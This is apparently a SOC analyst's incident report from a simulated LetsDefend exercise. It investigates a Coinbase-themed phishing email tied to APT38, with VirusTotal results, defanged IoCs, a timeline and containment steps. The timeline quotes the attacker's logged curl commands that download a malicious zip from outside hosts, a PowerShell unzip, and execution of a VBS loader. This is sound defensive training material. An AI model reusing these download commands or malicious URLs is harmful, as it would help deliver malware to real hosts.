Additional Info:
Investigation Date: 7/31/2026
1 Hour 34 Minutes Investigation Time
A phishing email impersonating Coinbase prompted user interaction, leading to the execution of malicious curl downloads and a VBS loader. The host was contained, malicious artifacts were removed, and no persistence or C2 activity was identified. Case closed as a true positive.
This investigation was performed in a simulated environment (LetsDefend). Certain artifacts, such as full email headers or raw EDR logs, were not available within the platform.
======== Title(s) ========
SOC337 - Lazarus Phishing Campaign Detected (APT38)
======== Alert Details ========
Event ID: 315
Event Time: Mar, 06, 2025, 07:15 AM
Rule : SOC337 - Lazarus Phishing Campaign Detected (APT38)
Level: Incident Responder
SMTP Address : 152.89.61[.]96
Source Address : trevorgreer9312 AT gmail[.]com
Destination Address: Ellen AT letsdefend.io
E-mail Subject :Invitation: Coinbase Crypto Trader Hiring Assessment
Device Action: Allowed
======== Raw logs/Headers ========
N/a
=============================================
== OSINT/SandboxAnalysis/ThreatIntel/Artifacts/References ==
https://www.virustotal.com/gui/ip-address/152.89.61.96
9/91
152.89.61[.]96
trevorgreer9312 AT gmail[.]com
(https://www.virustotal.com/gui/url/4d7ebfcefc1b9c25ddcdc921fcc1c792dc289f915532194f8d61d7f931dcae0c)
14/92
hxxps[]://]blockchainjobhub[.]com/invite/E3fM8yF7
(https://www.virustotal.com/gui/url/1dc0aa5a2878900868737a96c59e19660832cebbd8816b2860d8b03be851a372)
8/97
hxxps[]://]api[.]drivercams[.]cloud/nvidia-al[.]update
(https://www.virustotal.com/gui/file/f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b)
18/60
f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b
(https://www.virustotal.com/gui/file/9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85)
1/62
9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85
======== Historical Analysis ========
N/a
======== Queries Ran ========
Inbound traffic to the Ellen host IP of 172.16.17.214, revealing traffic to the download URLs
Checked for outbound traffic from 172.16.17.214 on SIEM, returning no data.
Checked scope to see if the sender address reached out to anyone else, confirmed this is the only host affected.
Checked if URLs "hxxps[]://]blockchainjobhub[.]com/invite/E3fM8yF7" and "hxxps[]://]files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/nvidiaupdate[.]zip" were accessed by anyone else, confirmed this was the only host to access these URLs.
======== Synopsis ========
> Queried the Email Security module for the employee Ellen and found the suspicious email that caused the trigger.
> Can confirm that the Email was received on Mar, 06, 2025, 07:15 AM from the sender email address listed in the alert details.
> Checked the reputation of the SMTP Address; internal threat intelligence returned no data, Virustotal marks it as malicious by 9 vendors (https://www.virustotal.com/gui/ip-address/152.89.61.96)
> Email body seems to mimic an assessment for a job, and contains a button that leads to a URL of "hxxps[]://]blockchainjobhub[.]com/invite/E3fM8yF7" that is marked as malicious as per virustotal ([https://www.virustotal.com/gui/url/4d7ebfcefc1b9c25ddcdc921fcc1c792dc289f915532194f8d61d7f931dcae0c](https://www.virustotal.com/gui/url/4d7ebfcefc1b9c25ddcdc921fcc1c792dc289f915532194f8d61d7f931dcae0c)) and tied it to APT 38 activity
> Endpoint security module shows that the host Ellen visited the malicious link on 2025-03-07 00:21:35
> 17-hour delay between email delivery and access; no evidence found to explain the gap (host was possibly idle/user away, unconfirmed)
> Log Management reveals that on Mar, 07, 2025, at 12:23 AM, the threat actor ran the command ""C:\Windows\system32\curl.exe" -k -o "C:\Users\LetsDefend\nvidiaupdate.zip" hxxps[]://]api[.]drivercams[.]cloud/nvidia-al[.]update" which seems to contact a different URL to download a file
> Endpoint security shows another curl command executed at Mar 7 2025, at 00:25:05, with the command being ""C:\Windows\system32\curl.exe" -k -o "C:\Users\LetsDefend\nvidiaupdate.zip" hxxps[]://]files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/nvidiaupdate[.]zip"
> URL from second Curl Command is marked as malicious by 8 vendors as per virustotal ([https://www.virustotal.com/gui/url/1dc0aa5a2878900868737a96c59e19660832cebbd8816b2860d8b03be851a372](https://www.virustotal.com/gui/url/1dc0aa5a2878900868737a96c59e19660832cebbd8816b2860d8b03be851a372)) and tied to a subgroup of Conti.
> EDR shows confirmed PowerShell execution on Mar 7 2025 00:25:27, revealing decompression of the installed zip file ("C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Expand-Archive -Force -Path 'C:\Users\LetsDefend\nvidiaupdate.zip' -DestinationPath 'C:\Users\LetsDefend\nvidiadrive'"). This command was ran 7 times up to the time of Mar 7 2025 00:25:42
> At Mar 7 2025 00:25:55 via the EDR, indication of the presence of a VBS script is present at the path of "C:\Users\LetsDefend\nvidiadrive\update.vbs"
> Checked Run/RunOnce registry keys, scheduled tasks, and service creation events on the host, no persistence mechanisms identified. Checked outbound connections and DNS queries post-execution, no C2 beaconing identified.
> Following playbook, Deleted Email from Recipients Mailbox
> Logged into host via EDR and obtained hashes in the malicious folder.
> VBS script is marked as malicious by 18 vendors ([https://www.virustotal.com/gui/file/f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b](https://www.virustotal.com/gui/file/f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b)) and seems to act as a Trojan to update NVIDIA drivers. Seems to come with a BAT file ([https://www.virustotal.com/gui/file/9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85](https://www.virustotal.com/gui/file/9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85)) and three other files called minictadriver.cat, MiniCtaDriver.inf, and MiniCtaDriver.sys.
> Continuing with playbook, contained the Ellen host
> Host logs via Event Viewer show that at 3/7/2025 12:25:54 AM the VBS script was run using wscript.exe
> Removed Malicious Zip and files from host
======== Closure Code ========
True positive; activity seems to be related to APT38 as well as a subgroup under Conti.
======== Recommendations ========
> Add IoCs to internal threat intelligence.
""
IP: 152.89.61[.]96
Email: trevorgreer9312 AT gmail[.]com
URl: hxxps[]://]blockchainjobhub[.]com/invite/E3fM8yF7
URL: hxxps[]://]api[.]drivercams[.]cloud/nvidia-al[.]update
SHA256: f10f1aa1b1adad456558d79084940b1d3d60329ed92210bbed7e3c55cc0b9a4b
SHA256: 9142d6dce5bf7cf2f690066d57dc86650a824acce7df93192a557eeb64e17c85
""
> Scan host and continue to monitor
> Rotate user passwords
